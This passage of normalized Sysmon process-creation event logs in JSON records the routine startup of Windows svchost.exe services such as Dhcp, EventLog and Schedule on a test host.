SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00104fee0000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1360", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.161Z", "type": "raw", "uuid": "6b410eb5-7dab-418b-bc4c-5c283a8dad56"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.6005726Z\"},\"EventRecordID\":\"27479\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.115\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00109fe80000}\"},{\"Name\":\"ProcessId\",\"text\":\"1308\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s nsi\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s nsi", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00109fe80000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1308", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.115Z", "type": "raw", "uuid": "16da7870-19ee-4486-8f63-33789e00bba6"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4871541Z\"},\"EventRecordID\":\"27475\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.064\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010dcdf0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1240\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s UserManager\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010dcdf0000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1240", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.064Z", "type": "raw", "uuid": "39de87fa-4045-4609-8be5-e8544a4229c5"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4853450Z\"},\"EventRecordID\":\"27474\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.053\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001089dd0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1212\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001089dd0000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1212", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.053Z", "type": "raw", "uuid": "b3956e3e-4c88-40c5-9a70-7f8765c475a2"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4827372Z\"},\"EventRecordID\":\"27470\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.008\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001032d70000}\"},{\"Name\":\"ProcessId\",\"text\":\"1156\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s ProfSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001032d70000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1156", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.008Z", "type": "raw", "uuid": "cf209215-f462-4906-ab00-ba5412e1f54e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.4321198Z\"},\"EventRecordID\":\"27469\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:16.929\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010a5d20000}\"},{\"Name\":\"ProcessId\",\"text\":\"1104\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010a5d20000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1104", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.929Z", "type": "raw", "uuid": "9229848f-6f89-4778-979e-bd22327b3cec"} 